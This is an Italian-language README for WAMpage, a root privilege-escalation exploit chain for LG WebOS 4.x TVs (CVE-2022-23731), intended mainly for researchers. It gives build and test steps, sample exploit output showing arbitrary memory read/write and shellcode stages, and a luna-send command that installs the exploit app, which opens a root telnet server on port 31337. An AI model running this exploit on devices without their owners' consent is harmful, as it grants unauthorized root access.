
WAMpage - Una catena di exploit LPE root per WebOS (CVE-2022-23731)
WAMpage - Una catena di exploit LPE per root su WebOS (CVE-2022-23731)
Questo exploit interessa principalmente altri ricercatori - se vuoi solo fare il root della tua TV, probabilmente vorrai RootMyTV, che offre un root persistente affidabile in un click.
Attualmente supporta solo WebOS 4.x su SoC a 32 bit. Questo software è fornito COSÌ COM'È, usalo a tuo rischio, ecc. ecc.
Writeup: https://www.da.vidbuchanan.co.uk/blog/webos-wampage.html

Prerequisiti:
apt install qemu-user
npm install -g @webosose/ares-cli
Compilazione:
make
make test compilerà ed eseguirà l'exploit in d8, in esecuzione su qemu-arm. (Una versione precompilata di d8 e le sue dipendenze sono incluse nella directory bin/). Se l'exploit funziona correttamente, probabilmente otterrai qualcosa del genere:
[+] Starting WAMpage...
[+] addrof(myobj) = 0x5a68f5d1
[+] Test: reconstructed myobj: {"foo":"bar"}
[+] Set up arbread32/arbwrite32.
[+] stage2 shellcode loaded @ 0xff458000
[+] myfunc @ 0x5a693369
[+] stage1 RWX buf @ 0x5bb8f280
[+] Copied stage1 shellcode. Calling...
Traceback (most recent call last):
File "<stdin>", line 25, in <module>
IOError: [Errno 13] Permission denied: '/dev/mem'
L'errore di permesso è previsto, assumendo che la tua macchina non sia totalmente malconfigurata.
Puoi testare l'exploit devmemes.py eseguendolo direttamente su una TV, ma avrai bisogno di root per iniziare, o di qualche altro tipo di shell senza sandbox/restrizioni.
Puoi usare ares-install, oppure copiare manualmente l'IPK ed eseguire questo comando dalla shell devmode:
luna-send-pub -i 'luna://com.webos.appInstallService/dev/install' '{"id":"tv.rootmy.wampage","ipkUrl":"/path/to/wampage.ipk","subscribe":true}'
Avvia l'app e premi il pulsante "Start Exploit". Se tutto va bene, un server telnet dovrebbe aprirsi sulla porta 31337.